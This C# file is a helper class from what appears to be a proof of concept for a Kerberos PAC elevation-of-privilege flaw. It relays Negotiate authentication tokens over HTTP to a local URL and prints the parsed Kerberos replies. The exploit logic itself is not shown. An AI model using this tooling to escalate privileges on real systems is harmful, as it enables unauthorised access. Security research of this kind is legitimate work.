﻿using NtApiDotNet.Win32.Security.Authentication;
using NtApiDotNet.Win32.Security.Authentication.Kerberos;
using System;
using System.Net;
using System.Net.Http;
using System.Threading.Tasks;

namespace PoC_HTTPKerberosPac_EoP
{
    public static class HttpAuthClient
    {
        private static readonly HttpClient client = new HttpClient();
        private static byte[] GetAuthTokenFromHeader(string auth)
        {
            var vals = auth.Split(' ');
            if (vals.Length > 1)
            {
                return Convert.FromBase64String(vals[1]);
            }

            return Array.Empty<byte>();
        }

        private static async Task<byte[]> ForwardToUrl(Uri uri, AuthenticationToken token)
        {
            byte[] token_bytes = token.ToArray();
            var request = new HttpRequestMessage(HttpMethod.Get, uri);
            request.Headers.Add("Authorization", $"Negotiate {Convert.ToBase64String(token_bytes)}");
            var response = await client.SendAsync(request);
            if (response.StatusCode == HttpStatusCode.Unauthorized)
            {
                foreach (var value in response.Headers.GetValues("WWW-Authenticate"))
                {
                    byte[] new_token = GetAuthTokenFromHeader(value);
                    if (new_token?.Length == 0)
                        throw new InvalidOperationException("Got back invalid authentication token.");
                    return new_token;
                }
            }
            response.EnsureSuccessStatusCode();
            await response.Content.ReadAsByteArrayAsync();
            return Array.Empty<byte>();
        }

        public const string DEFAULT_URL = "http://localhost:12345/abc/";

        public static async Task<bool> Request(Uri uri, IClientAuthenticationContext ctx)
        {
            while (ctx.Token.Length > 0)
            {
                byte[] response_token = await ForwardToUrl(uri, ctx.Token);
                if (response_token?.Length > 0)
                {
                    var new_token = AuthenticationToken.Parse(ctx, response_token);
                    Console.WriteLine(new_token.Format());
                    if (new_token is KerberosErrorAuthenticationToken)
                    {
                        return false;
                    }
                    if (!ctx.Done)
                    {
                        ctx.Continue(new AuthenticationToken(response_token));
                    }
                }
                else if (ctx.Done)
                {
                    break;
                }
            }
            return true;
        }

        public static Task<bool> Request(IClientAuthenticationContext ctx)
        {
            return Request(new Uri(DEFAULT_URL), ctx);
        }
    }
}
